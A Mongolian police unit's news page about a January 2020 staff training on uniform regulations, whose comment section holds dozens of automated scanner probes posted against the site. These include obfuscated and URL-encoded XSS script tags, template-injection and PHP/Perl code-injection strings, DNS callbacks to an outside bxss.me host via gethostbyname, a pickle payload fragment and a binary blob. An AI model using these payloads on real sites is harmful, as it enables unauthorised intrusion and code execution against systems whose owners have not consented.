• Нүүр хуудас
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт

СУРГАЛТ ЗОХИОН БАЙГУУЛЛАА

2020-01-10
СУРГАЛТ ЗОХИОН БАЙГУУЛЛАА

Тус албанаас алба хаагчдын мэдлэг, боловсролыг нэмэгдүүлэх, албаны дүрэмт хувцас өмсөж, хэрэглэх журмын хэрэгжилтийг хангуулах, Цагдаагийн ерөнхий газрын Захиргааны удирдлагын газрын даргаас 2019 оны 12 дугаар сарын 19-ний өдөр ирүүлсэн ажлын чиглэлийг хэрэгжүүлэх  зорилгоор 2020 оны 01 дүгээр сарын 10-ны өдөр Нийслэлийн цагдаагийн удирдах газрын Дотоод аюулгүй байдлын хэлтсийн Ёс журмын тасгийн ахлах офицер, цагдаагийн ахлах дэслэгч М.Ганзоригоор нийт алба хаагчдад Цагдаагийн ерөнхий газрын даргын 2018 оны А/143 дугаар тушаалаар баталсан “Дүрэмт болон ажлын хувцас өмсөж хэрэглэх журам”, Цагдаагийн байгууллагын үйл ажиллагааны “Дүрэмт хувцас өмсөж, хэрэглэх /код917/" журмаар тус тус сургалт оруулж, журмыг хэрэгжүүлэх талаар алба хаагчдад үүрэг чиглэл өглөө.

hnuXBVZl create
2020-07-17 Хариулах
hnuXBVZl create
2020-07-17 Хариулах
hnuXBVZl create/.
2020-07-17 Хариулах
hnuXBVZl \u003CScRiPt\O98S(9974)\u003C/sCripT\u003E
2020-07-17 Хариулах
hnuXBVZl
2020-07-17 Хариулах
hnuXBVZl %0D%0A%3C%53%63%52%69%50%74%20%3E%4F%39%38%53%289471%29%3C%2F%73%43%72%69%70%54%3E
2020-07-17 Хариулах
hnuXBVZl '"
2020-07-17 Хариулах
hnuXBVZl <ScRiPt >O98S(9299)
2020-07-17 Хариулах
hnuXBVZl {{49325*49985}}
2020-07-17 Хариулах
hnuXBVZl /\xfs.bxss.me
2020-07-17 Хариулах
hnuXBVZl 9824449
2020-07-17 Хариулах
hnuXBVZl acu6254<s1﹥s2ʺs3ʹuca6254
2020-07-17 Хариулах
hnuXBVZl acux3101��z1��z2a�bcxuca3101
2020-07-17 Хариулах
hnuXBVZl CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
2020-07-17 Хариулах
hnuXBVZl /xfs.bxss.me
2020-07-17 Хариулах
hnuXBVZl 972431
2020-07-17 Хариулах
hnuXBVZl http://xfs.bxss.me
2020-07-17 Хариулах
hnuXBVZl //xfs.bxss.me
2020-07-17 Хариулах
hnuXBVZl )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2020-07-17 Хариулах
hnuXBVZl '.gethostbyname(lc('hitue'.'ciyfvyce60967.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(88).chr(108).chr(78).'
2020-07-17 Хариулах
hnuXBVZl ".gethostbyname(lc("hitrz"."mfzsnlbz727d7.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(67).chr(98).chr(76)."
2020-07-17 Хариулах
hnuXBVZl )
2020-07-17 Хариулах
hnuXBVZl !(()&&!|*|*|
2020-07-17 Хариулах
hnuXBVZl ^(#$!@#$)(()))******
2020-07-17 Хариулах
hnuXBVZl ";print(md5(31337));$a="
2020-07-17 Хариулах
hnuXBVZl ${@print(md5(31337))}
2020-07-17 Хариулах
hnuXBVZl ${@print(md5(31337))}\
2020-07-17 Хариулах
hnuXBVZl '.print(md5(31337)).'
2020-07-17 Хариулах
hnuXBVZl ctime sleep p0 (I30 tp1 Rp2 .
2020-07-17 Хариулах
hnuXBVZl ;print(md5(31337));
2020-07-17 Хариулах